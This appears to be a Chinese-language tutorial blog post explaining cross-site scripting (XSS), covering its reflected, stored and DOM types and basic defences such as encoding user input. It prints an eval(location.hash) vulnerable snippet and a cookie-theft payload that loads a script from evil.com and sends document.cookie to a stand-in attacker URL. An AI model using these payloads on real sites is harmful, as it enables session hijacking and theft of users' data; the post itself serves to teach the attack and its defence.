跨站脚本攻击(XSS)

时间:2022-10-29 08:44:32
  • 跨站脚本攻击(XSS)

XSS发生在目标网站中目标用户的浏览器层面上,当用户浏览器渲染整个HTML文档的过程中就出现了不被预期的脚本执行。

跨站脚本的重点不是在“跨站”上,而应该在“脚本上”

简单例子:

在xss1.html页面上面有这么一段javascript

<script>
    eval(location.hash.substr(1));
</script>

当你在浏览器访问该xss1.html页面的时候,在url后面加上#alert('1') 如file:///C:/Users/Jie/Desktop/3.html#alert(1)

那么浏览器就会弹出这个1。

当然黑客是不会弹窗的,他会利用这个漏洞获取到你的cookie等有用的信息,如把#alert(1)替换成#document.write("<script src='www.evil.com/xss.js'></script>")

这个xss.js的代码是

new Image().src="http://www.evil.com/steal.aspx?data="+escape(document.cookie);

再在steal.aspx页面的后台获取data的值

你可能会问,谁这么SB在自己的页面写上那段javascript代码,首先要知道,这段代码不是开发人员在页面写的,而是后来被注入到页面的,怎么注入?这就要说到xss的攻击类型了

  • xss的攻击类型大体有反射型(或者叫非持久型)、存储型(或者叫持久型)、DOM XSS

1、反射型

 页面接受用户的输入,提交到服务器,服务器解析后在响应内容中含有这段xss代码,最后被浏览器解析执行。输入-》后台解析-》前台执行 这就是一个反射过程

比如:后台的代码获取xss.aspx?x=<script>alert(1)</script> url里面的x参数,然后直接在页面把这个x参数输出,那么这就是一个反射型的xss

2、存储型

因为现代的网页都是动态从数据库获取到数据然后生成html网页返回浏览器展示的,存储型的xss代码是直接存储在服务器里面了,当用户访问的这个有xss代码的页面时,攻击就发生了。这些xss代码一般是在获取用户输入的地方,没有做有效的防御,例如有个论坛,有黑客在留言板里面输入了一段含有xss攻击的留言,这个留言就存储到了后台数据库里面,当下一个用户查看这个留言板的时候。从后台返回的xss代码就能对该用户的信息作出攻击了。

3、DOM XSS

DOM XSS和反射型XSS、存储型XSS的差别在于 DOM XSS不需要经过服务器端的解析,触发xss靠的就是浏览器的DOM解析

例如本文开头提到的第一个例子就是DOM XSS

  • 防御手段

XSS的防御手段主要是:不信任用户的输入,校验用户的输入,对用户的输入输出都进行html编码。